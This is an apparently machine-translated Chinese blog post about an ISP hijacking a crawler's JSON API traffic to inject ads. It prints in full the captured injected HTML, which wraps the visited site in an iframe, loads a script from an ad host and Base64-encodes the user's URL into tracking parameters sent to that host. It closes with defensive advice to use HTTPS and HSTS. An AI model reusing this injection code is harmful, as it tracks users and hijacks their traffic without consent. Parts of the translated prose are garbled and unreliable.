Original: Taste of Little Sister (wechat official ID: XjjDog), welcome to share, please reserve the source.
Carrier (ISP) hijacking is a common rogue tactic. The operators inject into whatever traffic they can, sparing not even children, and brazenly pop up embarrassing ads in the lower-right corner or at the top and bottom of a web page. That makes things hard to explain for a mother who is helping her child with homework.
One, foreword
A classic interview question: What actually happens when you type in a web address and press enter?
It depends on what website to lose, Taobao chop hands, Baidu injury, Tencent injury kidney……
The mysterious return
The day was sunny and cloudless, with latency under 50 ms. It was a good day to let the crawlers (web scrapers) run free.
Grass (a plant), has not been discovered? To look at
But this interface, it’s all JSON.
Drink white water to appease the result of hot mouth…… Think about it. Product light drink does not eat vegetables also can not fall this demand, say I this small mosquito is not apt to take cannon bar.
There must be! – ask! – the topic!
I pulled the logs and checked the frequency: roughly one request in ten failed, and what came back was an entire HTML page instead of JSON. Take a look: whoever wrote this even hand-rolled Base64.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta id="viewport" name="viewport" content="Width =device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
</head>
<script>
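// Configuration object written into the page by whoever injected it.
// NOTE(review): the first character of the property name did not survive
// extraction and shows up as "? " on this page; the key is kept as printed.
// The separators between the entries were printed as "." and are restored to
// "," so that the object literal parses.
window["? $wins_pm"] = {
  // Ad endpoint; getURLwithParams() appends the tracking parameters to it.
  "a": "https://atplay.cn/banner/indexsd.aspx",
  // URL used as the iframe destination by goURLm() and sent, Base64-encoded,
  // as the "_su" parameter.
  "m": "http://baidu.com/",
  // Opaque values forwarded as "_us" and "_id"; their meaning is not visible
  // in this listing.
  "_xus": "YBsOw1mgMPSOdBFpMBFjYBQjMZSjMBsXM3gO",
  "_xai": "0"
};
// Script-level globals. Only `key` is read in this listing (by cu()); xp, lo and
// ho are presumably used by the externally loaded script, which is not shown.
var xp = null, key = "d=123", lo = location.href, ho = false;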
/**
 * Insert the script-level `key` marker ("d=123" in this capture) as the first
 * query parameter of a URL.
 *
 * A "?" at index 0 is treated the same as no "?" at all, so the marker is then
 * appended as a new query string. Nothing in the visible listing calls this
 * function; presumably the externally loaded script does (unconfirmed).
 *
 * @param {string} u - URL to tag.
 * @returns {string} The URL carrying the marker.
 */
function cu(u) {
  var queryStart = u.indexOf("?");
  if (queryStart <= 0) {
    // No usable query string: start one with the marker.
    return u + "?" + key;
  }
  // Splice the marker in directly after the "?" and keep the old parameters.
  var head = u.slice(0, queryStart + 1);
  var tail = u.slice(queryStart + 1);
  return head + key + "&" + tail;
}
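/**
 * Hand-rolled Base64 + UTF-8 codec carried by the injected page.
 *
 * In this listing the only caller is getURLwithParams(), which uses encode()
 * to pack the destination URL into the "_su" query parameter; decode() is not
 * called anywhere in the visible code.
 *
 * The shift and comparison operators and the replace() argument separators
 * were garbled on the page ("< <", "! =", '/g.""') and are restored here; the
 * logic is otherwise left as captured.
 *
 * NOTE(review): _keyStr, _utf8_encode, _utf8_decode, c1, c2 and c3 are assigned
 * without a declaration, so in the page's non-strict script they become
 * properties of the global object.
 */
function Base64() {
  // Standard Base64 alphabet; index 64 ("=") is the padding character.
  _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

  /**
   * Encode a string as Base64 over its UTF-8 bytes.
   * @param {string} input - Text to encode.
   * @returns {string} Base64 text, padded with "=".
   */
  this.encode = function(input) {
    var output = "";
    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
    var i = 0;
    input = _utf8_encode(input);
    while (i < input.length) {
      // Reading past the end yields NaN, which marks the padded positions.
      chr1 = input.charCodeAt(i++);
      chr2 = input.charCodeAt(i++);
      chr3 = input.charCodeAt(i++);
      enc1 = chr1 >> 2;
      enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
      enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
      enc4 = chr3 & 63;
      if (isNaN(chr2)) {
        enc3 = enc4 = 64
      } else if (isNaN(chr3)) {
        enc4 = 64
      }
      output = output + _keyStr.charAt(enc1) + _keyStr.charAt(enc2) + _keyStr.charAt(enc3) + _keyStr.charAt(enc4)
    }
    return output
  };

  /**
   * Decode Base64 text back to a string, interpreting the bytes as UTF-8.
   * Characters outside the Base64 alphabet are dropped before decoding.
   * @param {string} input - Base64 text.
   * @returns {string} Decoded text.
   */
  this.decode = function(input) {
    var output = "";
    var chr1, chr2, chr3;
    var enc1, enc2, enc3, enc4;
    var i = 0;
    input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
    while (i < input.length) {
      enc1 = _keyStr.indexOf(input.charAt(i++));
      enc2 = _keyStr.indexOf(input.charAt(i++));
      enc3 = _keyStr.indexOf(input.charAt(i++));
      enc4 = _keyStr.indexOf(input.charAt(i++));
      chr1 = (enc1 << 2) | (enc2 >> 4);
      chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
      chr3 = ((enc3 & 3) << 6) | enc4;
      output = output + String.fromCharCode(chr1);
      // Index 64 is "=": a padded position carries no byte.
      if (enc3 != 64) {
        output = output + String.fromCharCode(chr2)
      }
      if (enc4 != 64) {
        output = output + String.fromCharCode(chr3)
      }
    }
    output = _utf8_decode(output);
    return output
  };

  // Turn a string into a "byte string" with one char per UTF-8 byte. Only the
  // 1-, 2- and 3-byte forms are produced, working on UTF-16 code units.
  _utf8_encode = function(string) {
    string = string.replace(/\r\n/g, "\n");
    var utftext = "";
    for (var n = 0; n < string.length; n++) {
      var c = string.charCodeAt(n);
      if (c < 128) {
        utftext += String.fromCharCode(c)
      } else if ((c > 127) && (c < 2048)) {
        utftext += String.fromCharCode((c >> 6) | 192);
        utftext += String.fromCharCode((c & 63) | 128)
      } else {
        utftext += String.fromCharCode((c >> 12) | 224);
        utftext += String.fromCharCode(((c >> 6) & 63) | 128);
        utftext += String.fromCharCode((c & 63) | 128)
      }
    }
    return utftext
  };

  // Inverse of _utf8_encode: rebuild code units from 1-, 2- and 3-byte sequences.
  // Continuation bytes are not validated.
  _utf8_decode = function(utftext) {
    var string = "";
    var i = 0;
    var c = c1 = c2 = 0;
    while (i < utftext.length) {
      c = utftext.charCodeAt(i);
      if (c < 128) {
        string += String.fromCharCode(c);
        i++
      } else if ((c > 191) && (c < 224)) {
        c2 = utftext.charCodeAt(i + 1);
        string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
        i += 2
      } else {
        c2 = utftext.charCodeAt(i + 1);
        c3 = utftext.charCodeAt(i + 2);
        string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
        i += 3
      }
    }
    return string
  }
}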
// Publish one shared codec instance on the global object; getURLwithParams()
// reaches it through the bare name __BASE64.
window.__BASE64 = new Base64();
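/**
 * Build the ad-endpoint URL with the tracking parameters attached.
 *
 * The result is `a` plus "_us" (the `_xus` value), "_su" (the destination URL
 * `m`, Base64-encoded) and "_id" (the `_xai` value). For anyone assessing the
 * impact of the injection, this is the point where the URL the user was
 * visiting is packaged to be sent to the ad host. Nothing in the visible
 * listing calls this function; presumably the externally loaded script does.
 *
 * NOTE(review): the page printed the config name as "? $wins_pm" / "?$wins_pm"
 * and the query delimiters as '? ' and "? _us="; the config is read here through
 * the key exactly as it appears in the object literal, and the delimiters are
 * restored to "?" on the assumption that the spaces are extraction damage.
 *
 * @returns {string} Ad-endpoint URL including the _us, _su and _id parameters.
 */
function getURLwithParams() {
  var cfg = window["? $wins_pm"];
  // Continue an existing query string with "&", otherwise start one with "?".
  var sep = cfg.a.indexOf('?') > 0 ? "&" : "?";
  return cfg.a + sep + "_us=" + cfg._xus + "&_su=" + __BASE64.encode(cfg.m) + "&_id=" + cfg._xai;
}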
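/**
 * Produce the HTML document that fills the wrapper's iframe.
 *
 * The iframe's javascript: URL calls this function in the parent window; the
 * returned markup holds one script that navigates the frame to the configured
 * destination `m`, with a single trailing "/" removed. The mismatched
 * "<html></head>" tags are in the captured string and are kept.
 *
 * "vardesturl" and "= =" on the page are restored to "var desturl" and "==";
 * the config is read through the key exactly as printed in the object literal.
 *
 * NOTE(review): desturl is concatenated into a script string literal without
 * any escaping, so a quote or a closing script tag inside the destination URL
 * would change the generated document. Worth keeping in mind when assessing
 * what else this wrapper exposes users to.
 *
 * @returns {string} HTML text for the iframe document.
 */
function goURLm() {
  var desturl = window["? $wins_pm"].m;
  if (desturl.slice(desturl.length - 1) == "/") desturl = desturl.slice(0, desturl.length - 1);
  return "<html></head><script>document.location.replace(\"" + desturl + "\"); <\/script><\/html>"
}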
</script>
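<body style="margin:0; padding:0;">
<!-- Analysis note: the statistics tag on the next line is commented out in the capture. The page rendering showed the comment opener with a space inside it; it is restored here so that the whole line is again one comment. -->
<!--<div style="display: none;" ><script src="https://s6.cnzz.com/z_stat.php?id=722749&web_id=722749" language="JavaScript"></script></div>-->
<!-- Analysis note: this script comes from the same host as the "a" endpoint in the config object and runs in the outer (top-level) document. Its contents are not part of this listing. -->
<script type="text/javascript" src="https://atplay.cn/banner/indexsd.js"></script>
<div style="width:100%; height:100%; -webkit-overflow-scrolling:touch; overflow-y:scroll;">
<!-- Analysis note: the javascript: URL calls goURLm() in the parent, so the frame is filled with a document that navigates to the originally requested URL. The user sees the real site in a full-size frame while the wrapper keeps the outer page. A client that expected JSON receives this HTML instead. -->
<iframe id='ifrmain' src='JavaScript:parent.goURLm()' scrolling=auto width='100%' height='100%' frameborder='no' onload=' '></iframe>
</div>
</body>
</html>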
3. The truth is out
Dubious! The truth is that this crappy code has nothing to do with the crawler at all. Judging by its style, it is probably the handiwork of the broadband operator; I have seen a visit to Baidu get wrapped in an iframe like this before. What I never expected is that they would be desperate enough not to spare even a JSON interface, and to rewrite the response this heavily!
This is equivalent to just want to take a taxi out of the airport to scenic spots, the result is a black car ah, pulling to have a meal sauna big sword, empty wallet to pat the ground!
Since we’re sure it’s a black car, we’ll just move the stupid fish. Let’s look at the effect
Holding back my disgust, I went through the code, found the domain and ran it through whois.
With the company name in hand, I looked it up on Baidu, Tianyancha and Qichacha… That's him. That's the one.
Four, the result?
This kind of injection is usually impossible without the cooperation of the broadband operator. At home I currently have lines from two carriers, written here as "X letter" and "X motion". After repeated tests, only the "X motion" line shows the problem. That makes the next step simple.
File a complaint with the Ministry of Industry and Information Technology (MIIT)! Address: dxss.miit.gov.cn/
The storm passed again, but it — I’m afraid it won’t be the last.
Five, what should I do with my website?
There’s nothing wrong with you hijacking. Soil is what it is. But you write this hijacking bot is also too silly, even json format are done, let people open the company how is good. You know, now a lot of services, there is no web end, hijacking the program to rise.
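Once upon a time our websites were all plain HTTP, which made them a favorite target for hijacking. The solution is to upgrade to HTTPS, which makes this kind of on-path injection much harder and protects users as well as the site itself. Because the very first plain-HTTP request or redirect can still be rewritten on the wire, serve everything over HTTPS and enable HSTS, and have API clients reject any response that is not the JSON they expect.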
Xjjdog is a public account that doesn’t allow programmers to get sidetracked. Focus on infrastructure and Linux. Ten years architecture, ten billion daily flow, and you discuss the world of high concurrency, give you a different taste. My personal wechat xjjdog0, welcome to add friends, further communication.